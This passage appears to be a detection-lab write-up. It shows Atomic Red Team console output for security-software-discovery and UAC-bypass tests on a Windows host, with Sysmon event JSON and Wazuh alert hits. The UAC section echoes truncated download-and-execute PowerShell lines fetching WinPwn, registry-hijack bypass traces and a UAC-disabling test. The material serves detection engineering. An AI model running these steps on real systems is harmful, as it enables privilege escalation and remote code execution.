Corporation","originalFileName":"scrobj.dll","hashes":"SHA1=BAFFA3B8D2012F2A84278994CECD877B3364CE93,MD5=06CC2FB88C5DA8B13E6A31B3F6C6A0D5,SHA256=0D7AE861D31EFC7E2965DDE5074A906051B2814DD201B4A334ED2358245AEB97,IMPHASH=91B5CDDA29C7F7E7003EC3E46D9028BC","signed":"true","signature":"Microsoft Windows","signatureStatus":"Valid","user":"EC2AMAZ-3188I1R\\\\Administrator"}}}

Dashboard event entry

T1518.001 – Software Discovery: Security Software Discovery 🟢

GetPrereqs

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1518.001 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1518.001-1 Security Software Discovery
No Preqs Defined
GetPrereq's for: T1518.001-2 Security Software Discovery - powershell
No Preqs Defined
GetPrereq's for: T1518.001-5 Security Software Discovery - Sysmon Service
No Preqs Defined
GetPrereq's for: T1518.001-6 Security Software Discovery - AV Discovery via WMI

Test run

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1518.001
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1518.001-1 Security Software Discovery
Domain Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (GPO-store only)
LocalConSecRules                      N/A (GPO-store only)
InboundUserNotification               Disable
RemoteManagement                      Disable
UnicastResponseToMulticast            Enable
Logging:
LogAllowedConnections                 Disable
LogDroppedConnections                 Disable
FileName                              %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize                           4096
Private Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (GPO-store only)
LocalConSecRules                      N/A (GPO-store only)
InboundUserNotification               Disable
RemoteManagement                      Disable
UnicastResponseToMulticast            Enable
Logging:
LogAllowedConnections                 Disable
LogDroppedConnections                 Disable
FileName                              %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize                           4096
Public Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (GPO-store only)
LocalConSecRules                      N/A (GPO-store only)
InboundUserNotification               Disable
RemoteManagement                      Disable
UnicastResponseToMulticast            Enable
Logging:
LogAllowedConnections                 Disable
LogDroppedConnections                 Disable
FileName                              %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize                           4096
Ok.
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          8 K
System                           4 Services                   0         12 K
Registry                        76 Services                   0     41,264 K
smss.exe                       420 Services                   0         40 K
csrss.exe                      568 Services                   0        560 K
csrss.exe                      636 Console                    1        100 K
wininit.exe                    652 Services                   0          8 K
winlogon.exe                   692 Console                    1         12 K
services.exe                   756 Services                   0      3,788 K
lsass.exe                      764 Services                   0      6,988 K
svchost.exe                    868 Services                   0      8,080 K
fontdrvhost.exe                888 Services                   0         16 K
fontdrvhost.exe                896 Console                    1         16 K
svchost.exe                    956 Services                   0      7,800 K
dwm.exe                        524 Console                    1      9,216 K
LogonUI.exe                    572 Console                    1     11,648 K
svchost.exe                    824 Services                   0     82,788 K
svchost.exe                    972 Services                   0     14,228 K
svchost.exe                   1036 Services                   0      5,656 K
svchost.exe                   1152 Services                   0     10,552 K
svchost.exe                   1216 Services                   0      7,636 K
svchost.exe                   1240 Services                   0     26,172 K
svchost.exe                   1380 Services                   0     12,256 K
svchost.exe                   1388 Services                   0        236 K
svchost.exe                   1536 Services                   0      6,272 K
svchost.exe                   1584 Services                   0        916 K
spoolsv.exe                   1952 Services                   0         16 K                                                                                                                                                           amazon-ssm-agent.exe          2036 Services                   0      6,372 K                                                                                                                                                           LiteAgent.exe                 2044 Services                   0        644 K                                                                                                                                                           svchost.exe                   1660 Services                   0      2,848 K                                                                                                                                                           svchost.exe                   1344 Services                   0        640 K                                                                                                                                                           svchost.exe                   2344 Services                   0        916 K                                                                                                                                                           ssm-agent-worker.exe          1116 Services                   0      6,356 K                                                                                                                                                           conhost.exe                   1820 Services                   0        512 K                                                                                                                                                           msdtc.exe                     3308 Services                   0         16 K                                                                                                                                                           svchost.exe                   1064 Services                   0      9,496 K                                                                                                                                                           svchost.exe                    784 Services                   0        992 K                                                                                                                                                           MsMpEng.exe                   3692 Services                   0    118,092 K                                                                                                                                                           NisSrv.exe                    3112 Services                   0      2,344 K                                                                                                                                                           csrss.exe                     2400 RDP-Tcp#0                  2        880 K                                                                                                                                                           winlogon.exe                  1784 RDP-Tcp#0                  2         12 K                                                                                                                                                           fontdrvhost.exe               3736 RDP-Tcp#0                  2        156 K                                                                                                                                                           dwm.exe                       3916 RDP-Tcp#0                  2     43,744 K
rdpclip.exe                   1264 RDP-Tcp#0                  2      3,864 K
sihost.exe                    1612 RDP-Tcp#0                  2     12,244 K
svchost.exe                   1184 RDP-Tcp#0                  2     16,976 K
taskhostw.exe                 3340 RDP-Tcp#0                  2      1,396 K
ctfmon.exe                    2160 RDP-Tcp#0                  2      5,780 K
explorer.exe                  1736 RDP-Tcp#0                  2     31,284 K
StartMenuExperienceHost.e      688 RDP-Tcp#0                  2      5,968 K
TextInputHost.exe             3884 RDP-Tcp#0                  2      8,512 K
RuntimeBroker.exe             2392 RDP-Tcp#0                  2      1,612 K
SearchApp.exe                 4152 RDP-Tcp#0                  2         12 K
RuntimeBroker.exe             4272 RDP-Tcp#0                  2      2,704 K
RuntimeBroker.exe             4396 RDP-Tcp#0                  2      1,860 K
svchost.exe                   5520 RDP-Tcp#0                  2      5,888 K
taskhostw.exe                 6028 RDP-Tcp#0                  2         16 K
dllhost.exe                   1192 RDP-Tcp#0                  2      1,712 K
ShellExperienceHost.exe       6552 RDP-Tcp#0                  2     20,796 K
RuntimeBroker.exe             6716 RDP-Tcp#0                  2      9,632 K
msedge.exe                    2520 RDP-Tcp#0                  2     40,796 K
msedge.exe                    6472 RDP-Tcp#0                  2      1,144 K
msedge.exe                    2760 RDP-Tcp#0                  2     12,752 K
msedge.exe                    4708 RDP-Tcp#0                  2      7,912 K
msedge.exe                    6256 RDP-Tcp#0                  2      1,616 K
msedge.exe                    4072 RDP-Tcp#0                  2     28,064 K
svchost.exe                   4528 RDP-Tcp#0                  2        896 K
msedge.exe                    3132 RDP-Tcp#0                  2      3,208 K
powershell.exe                4640 RDP-Tcp#0                  2     10,640 K
conhost.exe                   6440 RDP-Tcp#0                  2      6,180 K
Sysmon64.exe                  4508 Services                   0     10,272 K
unsecapp.exe                  3756 Services                   0      1,856 K
SecurityHealthService.exe     3000 Services                   0      4,916 K
mmc.exe                       4412 RDP-Tcp#0                  2     22,844 K
wazuh-agent.exe               7004 Services                   0     13,496 K
powershell.exe                5592 RDP-Tcp#0                  2     65,616 K
conhost.exe                   6700 RDP-Tcp#0                  2     21,320 K
WUDFHost.exe                  5352 Services                   0     24,240 K
cmd.exe                       6108 RDP-Tcp#0                  2      4,204 K
conhost.exe                   5320 RDP-Tcp#0                  2     11,000 K
tasklist.exe                  5244 RDP-Tcp#0                  2      8,672 K
WmiPrvSE.exe                  6016 Services                   0      9,068 K
Done executing test: T1518.001-1 Security Software Discovery
Executing test: T1518.001-2 Security Software Discovery - powershell
Done executing test: T1518.001-2 Security Software Discovery - powershell
Executing test: T1518.001-5 Security Software Discovery - Sysmon Service
SysmonDrv                               2       385201         0
Done executing test: T1518.001-5 Security Software Discovery - Sysmon Service
Executing test: T1518.001-6 Security Software Discovery - AV Discovery via WMI
ERROR:
Description = Invalid namespace
Done executing test: T1518.001-6 Security Software Discovery - AV Discovery via WMI

Cleanup

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1518.001 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1518.001-1 Security Software Discovery
Done executing cleanup for test: T1518.001-1 Security Software Discovery
Executing cleanup for test: T1518.001-2 Security Software Discovery - powershell
Done executing cleanup for test: T1518.001-2 Security Software Discovery - powershell
Executing cleanup for test: T1518.001-5 Security Software Discovery - Sysmon Service
Done executing cleanup for test: T1518.001-5 Security Software Discovery - Sysmon Service
Executing cleanup for test: T1518.001-6 Security Software Discovery - AV Discovery via WMI
Done executing cleanup for test: T1518.001-6 Security Software Discovery - AV Discovery via WMI

Event log

Rule: 115004 (level 10) -> 'Security Software Discovery Attempt has been Detected on EC2AMAZ-3188I1R'
{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}","eventID":"1","version":"5","level":"4","task":"1","opcode":"0","keywords":"0x8000000000000000","systemTime":"2022-07-18T16:34:54.8695266Z","eventRecordID":"9801","processID":"4508","threadID":"92","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","severityValue":"INFORMATION","message":"\"Process Create:\r\nRuleName: technique_id=T1518.001,technique_name=Security Software Discovery\r\nUtcTime: 2022-07-18 16:34:54.862\r\nProcessGuid: {a64f3178-8bae-62d5-fd06-000000009000}\r\nProcessId: 104\r\nImage: C:\\Windows\\System32\\fltMC.exe\r\nFileVersion: 10.0.20348.1 (WinBuild.160101.0800)\r\nDescription: Filter Manager Control Program\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: fltMC.exe\r\nCommandLine: fltmc.exe  \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\2\\\r\nUser: EC2AMAZ-3188I1R\\Administrator\r\nLogonGuid: {a64f3178-1b8a-62d5-e934-1b0000000000}\r\nLogonId: 0x1B34E9\r\nTerminalSessionId: 2\r\nIntegrityLevel: High\r\nHashes: SHA1=389A68B031CBC0A9E1C71D69CADC5C7579AE620A,MD5=920F1BBF89DF2B8A5F4C10FA400E5A67,SHA256=5C7C65475F4F85B5684B63AE4384BE9A3B948A0FE77A24B345E1F4291BC90964,IMPHASH=3BB9381340F6C7B1E51AD45AB82E32D2\r\nParentProcessGuid: {a64f3178-8bae-62d5-fb06-000000009000}\r\nParentProcessId: 4204\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"cmd.exe\" /c \"fltmc.exe | findstr.exe 385201\"\r\nParentUser: EC2AMAZ-3188I1R\\Administrator\""},"eventdata":{"ruleName":"technique_id=T1518.001,technique_name=Security Software Discovery","utcTime":"2022-07-18 16:34:54.862","processGuid":"{a64f3178-8bae-62d5-fd06-000000009000}","processId":"104","image":"C:\\\\Windows\\\\System32\\\\fltMC.exe","fileVersion":"10.0.20348.1 (WinBuild.160101.0800)","description":"Filter Manager Control Program","product":"Microsoft® Windows® Operating System","company":"Microsoft Corporation","originalFileName":"fltMC.exe","commandLine":"fltmc.exe","currentDirectory":"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\","user":"EC2AMAZ-3188I1R\\\\Administrator","logonGuid":"{a64f3178-1b8a-62d5-e934-1b0000000000}","logonId":"0x1b34e9","terminalSessionId":"2","integrityLevel":"High","hashes":"SHA1=389A68B031CBC0A9E1C71D69CADC5C7579AE620A,MD5=920F1BBF89DF2B8A5F4C10FA400E5A67,SHA256=5C7C65475F4F85B5684B63AE4384BE9A3B948A0FE77A24B345E1F4291BC90964,IMPHASH=3BB9381340F6C7B1E51AD45AB82E32D2","parentProcessGuid":"{a64f3178-8bae-62d5-fb06-000000009000}","parentProcessId":"4204","parentImage":"C:\\\\Windows\\\\System32\\\\cmd.exe","parentCommandLine":"\\\"cmd.exe\\\" /c \\\"fltmc.exe | findstr.exe 385201\\\"","parentUser":"EC2AMAZ-3188I1R\\\\Administrator"}}}

Dashboard event entry

T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control 🟢

GetPrereqs

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002 -GetPrereqs                                                                                                                                                    PathToAtomicsFolder = C:\AtomicRedTeam\atomics                                                                                                                                                                                                                                                                                                                                                                                                                                GetPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd)
No Preqs Defined
GetPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
No Preqs Defined
GetPrereq's for: T1548.002-3 Bypass UAC using Fodhelper
No Preqs Defined
GetPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
No Preqs Defined
GetPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
No Preqs Defined
GetPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories
No Preqs Defined
GetPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute
No Preqs Defined
GetPrereq's for: T1548.002-8 Disable UAC using reg.exe
No Preqs Defined
GetPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task
No Preqs Defined
GetPrereq's for: T1548.002-10 UACME Bypass Method 23
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\23 Akagi64.exe)
Prereq successfully met: UACME executable must exist on disk at specified location (%temp%\uacme\23 Akagi64.exe)
GetPrereq's for: T1548.002-11 UACME Bypass Method 31
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\31 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\31 Akagi64.exe)
GetPrereq's for: T1548.002-12 UACME Bypass Method 33
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\33 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\33 Akagi64.exe)
GetPrereq's for: T1548.002-13 UACME Bypass Method 34
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\34 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\34 Akagi64.exe)
GetPrereq's for: T1548.002-14 UACME Bypass Method 39
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\39 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\39 Akagi64.exe)
GetPrereq's for: T1548.002-15 UACME Bypass Method 56
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\56 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\56 Akagi64.exe)
GetPrereq's for: T1548.002-16 UACME Bypass Method 59
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\59 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\59 Akagi64.exe)
GetPrereq's for: T1548.002-17 UACME Bypass Method 61
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\61 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\61 Akagi64.exe)
GetPrereq's for: T1548.002-18 WinPwn - UAC Magic
No Preqs Defined
GetPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
No Preqs Defined
GetPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
No Preqs Defined
GetPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
No Preqs Defined

Test run

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002                                                                                                                                                                PathToAtomicsFolder = C:\AtomicRedTeam\atomics                                                                                                                                                                                                                                                                                                                                                                                                                                Executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
The operation completed successfully.
Microsoft Windows [Version 10.0.20348.768]
(c) Microsoft Corporation. All rights reserved.
C:\Users\ADMINI~1\AppData\Local\Temp\2>                                                                                                                                                                                                Done executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)                                                                                                                                                                   Executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                                                                                                                                                 Hive: HKEY_CURRENT_USER\software\classes\mscfile\shell\open                                                                                                                                                                            Name                           Property                                                                                                                                                                                                ----                           --------                                                                                                                                                                                                command                                                                                                                                                                                                                                Done executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                                                                                                                                            Executing test: T1548.002-3 Bypass UAC using Fodhelper                                                                                                                                                                                 Exception calling "Start" with "0" argument(s): "Access is denied"                                                                                                                                                                     At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:46 char:17                                                                                                                                                         +                 $process.Start() > $null                                                                                                                                                                                             +                 ~~~~~~~~~~~~~~~~~~~~~~~~                                                                                                                                                                                                 + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException                                                                                                                                                              + FullyQualifiedErrorId : Win32Exception                                                                                                                                                                                                                                                                                                                                                                                                                                  Done executing test: T1548.002-3 Bypass UAC using Fodhelper                                                                                                                                                                            Executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell                                                                                                                                                                    Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open                                                                                                                                                                        Name                           Property                                                                                                                                                                                                ----                           --------                                                                                                                                                                                                command                                                                                                                                                                                                                                DelegateExecute :                                                                                                                                                                                                                      PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command                                                                                                                PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open                                                                                                                        PSChildName     : command                                                                                                                                                                                                              PSDrive         : HKCU                                                                                                                                                                                                                 PSProvider      : Microsoft.PowerShell.Core\Registry                                                                                                                                                                                   Done executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell                                                                                                                                                               Executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                                                                                                                                                             Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open                                                                                                                                                                        Name                           Property                                                                                                                                                                                                ----                           --------                                                                                                                                                                                                command                                                                                                                                                                                                                                DelegateExecute :                                                                                                                                                                                                                      PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command                                                                                                                PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open                                                                                                                        PSChildName     : command                                                                                                                                                                                                              PSDrive         : HKCU                                                                                                                                                                                                                 PSProvider      : Microsoft.PowerShell.Core\Registry                                                                                                                                                                                   Done executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                                                                                                                                                        Executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                                                                                                                                                  1 file(s) copied.                                                                                                                                                                                                                      symbolic link created for c:\testbypass.exe <<===>> \\?\C:\Windows \System32\mmc.exe                                                                                                                                                   Done executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                                                                                                                                             Executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                                                                                                                                                     Hive: HKEY_CURRENT_USER\Software\Classes\Folder\shell\open                                                                                                                                                                             Name                           Property                                                                                                                                                                                                ----                           --------                                                                                                                                                                                                command                        (default) : cmd.exe /c notepad.exe                                                                                                                                                                      DelegateExecute :                                                                                                                                                                                                                      PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command                                                                                                                     PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open                                                                                                                             PSChildName     : command                                                                                                                                                                                                              PSDrive         : HKCU                                                                                                                                                                                                                 PSProvider      : Microsoft.PowerShell.Core\Registry                                                                                                                                                                                   Start-Process : This command cannot be run due to the error: The system cannot find the file specified.
At line:3 char:1
+ Start-Process -FilePath $env:windir\system32\sdclt.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Start-Process], InvalidOperationException
    + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand
Done executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Done executing test: T1548.002-8 Disable UAC using reg.exe
Executing test: T1548.002-9 Bypass UAC using SilentCleanup task
The screen cannot be set to the number of lines and columns specified.                                                                                                                                                                 The operation completed successfully.                                                                                                                                                                                                  ERROR: Input redirection is not supported, exiting the process immediately.                                                                                                                                                            Access is denied.                                                                                                                                                                                                                      ERROR: Input redirection is not supported, exiting the process immediately.                                                                                                                                                            Done executing test: T1548.002-9 Bypass UAC using SilentCleanup task                                                                                                                                                                   Executing test: T1548.002-10 UACME Bypass Method 23                                                                                                                                                                                    '"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\23 Akagi64.exe"' is not recognized as an internal or external command,                                                                                                                  operable program or batch file.
Done executing test: T1548.002-10 UACME Bypass Method 23
Executing test: T1548.002-11 UACME Bypass Method 31
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\31 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-11 UACME Bypass Method 31
Executing test: T1548.002-12 UACME Bypass Method 33
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\33 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-12 UACME Bypass Method 33
Executing test: T1548.002-13 UACME Bypass Method 34
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\34 Akagi64.exe"' is not recognized as an internal or external command,                                                                                                                  operable program or batch file.                                                                                                                                                                                                        Done executing test: T1548.002-13 UACME Bypass Method 34                                                                                                                                                                               Executing test: T1548.002-14 UACME Bypass Method 39                                                                                                                                                                                    '"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\39 Akagi64.exe"' is not recognized as an internal or external command,                                                                                                                  operable program or batch file.                                                                                                                                                                                                        Done executing test: T1548.002-14 UACME Bypass Method 39                                                                                                                                                                               Executing test: T1548.002-15 UACME Bypass Method 56                                                                                                                                                                                    '"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\56 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-15 UACME Bypass Method 56
Executing test: T1548.002-16 UACME Bypass Method 59
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\59 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-16 UACME Bypass Method 59
Executing test: T1548.002-17 UACME Bypass Method 61
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\61 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-17 UACME Bypass Method 61
Executing test: T1548.002-18 WinPwn - UAC Magic                                                                                                                                                                                        iex : At line:1 char:1                                                                                                                                                                                                                 + #  Global TLS Setting for all functions. If TLS12 isn't suppported yo ...                                                                                                                                                            + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                                                                                                                                This script contains malicious content and has been blocked by your antivirus software.                                                                                                                                                At line:2 char:1                                                                                                                                                                                                                       + iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...                                                                                                                                                            + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                                                                                                                                    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable                                                                                                                         program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.                                                                                                                     At line:3 char:1                                                                                                                                                                                                                       + UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ...                                                                                                                                                            + ~~~~~~~~~                                                                                                                                                                                                                                + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException                                                                                                                                              + FullyQualifiedErrorId : CommandNotFoundException                                                                                                                                                                                 Done executing test: T1548.002-18 WinPwn - UAC Magic
Executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
iex : At line:1 char:1
+ #  Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:3 char:1
+ UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -te ...
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
Done executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
iex : At line:1 char:1
+ #  Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:3 char:1
+ UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ...
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
Done executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
iex : At line:1 char:1
+ function dccuacbypass
+ ~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:4
+ & {iex(new-object net.webclient).downloadstring('https://raw.githubus ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
Done executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique

Cleanup

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Executing cleanup for test: T1548.002-17 UACME Bypass Method 61
